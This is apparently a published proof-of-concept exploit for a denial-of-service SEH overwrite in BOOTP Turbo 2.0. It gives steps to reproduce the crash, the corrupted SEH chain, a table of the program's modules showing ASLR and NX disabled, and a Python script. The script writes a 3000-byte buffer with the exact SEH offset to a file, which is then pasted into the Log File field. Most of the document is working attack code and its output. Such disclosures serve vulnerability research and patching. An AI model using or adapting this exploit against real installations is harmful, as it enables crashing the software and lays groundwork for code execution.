# Exploit Title: BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)
# Exploit Author: boku
# Date: 2020-01-22
# Software Vendor: Wierd Solutions
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
# Version: BOOTP Turbo (x86) Version 2.0
# Tested On: Windows 10 Pro -- 10.0.18363 Build 18363 x86-based PC
# Tested On: Windows 7 Enterprise SP1 -- build 7601 64-bit 
# Replicate Crash:
#  1) Download, Install, and Open BootP Turbo v2.0 for windows x86
#  2) Go to Edit > Settings > Click the Detailed Logging Box
#  3) Run python script, open created file 'crash.txt'
#  4) Select-All > Copy All, from file
#  5) Paste buffer in the 'Log File' text-box, Click 'OK'
#  6) Close the 'Control Service' Pop-Up Window
#  7) Crash with SEH Overwrite

# SEH chain of main thread
# Address    SE handler
# 019CD254   43434343
# 42424242   *** CORRUPT ENTRY ***

# Loaded Application Modules
#  Rebase | SafeSEH | ASLR  | NXCompat | Version, Modulename & Path
#  True   | True    | False |  False   | 4.7.3.0 [QtGui4.dll] (C:\Program Files\BOOTP Turbo\QtGui4.dll)
#  True   | True    | False |  False   | 4.7.3.0 [QtCore4.dll] (C:\Program Files\BOOTP Turbo\QtCore4.dll)
#  True   | True    | False |  False   | 10.00.30319.1 [MSVCP100.dll] (C:\Program Files\BOOTP Turbo\MSVCP100.dll)
#  True   | True    | False |  False   | 2.0 [bootptui.exe] (C:\Program Files\BOOTP Turbo\bootptui.exe)
#  True   | True    | False |  False   | 10.00.30319.1 [MSVCR100.dll] (C:\Program Files\BOOTP Turbo\MSVCR100.dll)

#!/usr/bin/python

offset = '\x41'*2196
nSEH = '\x42\x42\x42\x42'
SEH = '\x43\x43\x43\x43'
filler = '\x44'*(3000-len(offset+nSEH+SEH))

payload = offset+nSEH+SEH+filler

try:
    f=open("crash.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")